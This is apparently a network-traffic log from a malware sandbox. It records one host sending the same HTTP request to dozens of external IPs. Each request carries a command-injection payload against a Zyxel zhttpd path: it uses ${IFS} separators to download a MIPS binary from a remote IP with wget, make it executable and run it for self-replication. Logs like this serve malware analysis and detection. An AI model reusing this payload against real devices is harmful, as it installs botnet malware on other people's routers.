                                      Jan 14, 2024 15:50:58.579906940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7462192.168.2.144725671.166.144.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579952002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7463192.168.2.1445484174.49.7.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.579998970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7464192.168.2.1440912148.15.132.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580033064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7465192.168.2.145286027.36.116.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580061913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7466192.168.2.1457694177.23.244.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580110073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7467192.168.2.143384251.7.207.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580148935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7468192.168.2.1437228119.144.7.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580178976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7469192.168.2.144502854.16.162.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580224991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7470192.168.2.143673837.161.77.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580252886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7471192.168.2.1437166131.185.80.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580296040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7472192.168.2.1450320133.216.194.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580346107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7473192.168.2.1437008219.34.82.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580380917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7474192.168.2.145776673.95.187.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580435991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7475192.168.2.144857052.194.17.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580483913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7476192.168.2.1443300213.30.181.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580527067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7477192.168.2.144792482.135.53.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580565929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7478192.168.2.143666692.93.57.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580619097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7479192.168.2.145031279.107.214.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580718040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7480192.168.2.1441640205.138.189.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580754995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7481192.168.2.143718448.92.110.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580799103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7482192.168.2.1443488124.45.131.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580823898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7483192.168.2.1450538205.8.225.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580878019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7484192.168.2.1443652205.155.220.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580908060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7485192.168.2.1439784206.56.252.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580940962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7486192.168.2.145763665.134.188.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.580975056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7487192.168.2.143382075.37.136.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581020117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7488192.168.2.1433242123.163.174.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581065893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7489192.168.2.1450914169.50.197.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581093073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7490192.168.2.144439488.203.49.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581145048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7491192.168.2.145114847.116.207.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581191063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7492192.168.2.1441210167.77.95.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581224918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7493192.168.2.1437244169.116.150.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581260920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7494192.168.2.145082698.145.9.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581301928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7495192.168.2.14377788.116.28.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581321001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7496192.168.2.1440404113.170.209.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581379890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7497192.168.2.145621223.15.86.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581429958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7498192.168.2.144320657.78.107.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581475973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7499192.168.2.1449748121.33.211.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581507921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7500192.168.2.1444036106.224.37.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581553936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7501192.168.2.1446408101.128.18.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581578970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7502192.168.2.1438674114.216.239.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581618071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7503192.168.2.1434664211.208.33.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581649065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7504192.168.2.1436820187.59.213.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.581691980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7505192.168.2.1446126165.14.68.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585521936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7506192.168.2.146035032.56.190.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585546017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7507192.168.2.1446566198.101.248.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585597038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7508192.168.2.1433446103.81.228.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585640907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7509192.168.2.1446328204.189.178.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585692883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7510192.168.2.1433858148.227.228.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585736036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7511192.168.2.1454522190.209.118.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585760117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7512192.168.2.1433782198.90.154.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585803032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7513192.168.2.145838275.111.109.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585853100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7514192.168.2.1458596210.157.122.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585906029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7515192.168.2.145853647.165.100.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585967064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7516192.168.2.145454017.14.89.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.585993052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7517192.168.2.1460124142.118.18.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.586026907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7518192.168.2.1435268210.15.105.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.586081982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7519192.168.2.1440050131.87.119.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.586117983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7520192.168.2.144331842.13.168.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.586141109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7521192.168.2.1440450213.220.239.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:58.586199999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7522192.168.2.146044657.34.190.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594218016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7523192.168.2.1449010140.80.215.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.594268084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7524192.168.2.14551984.235.22.59443
                                      TimestampBytes transferredDirectionData
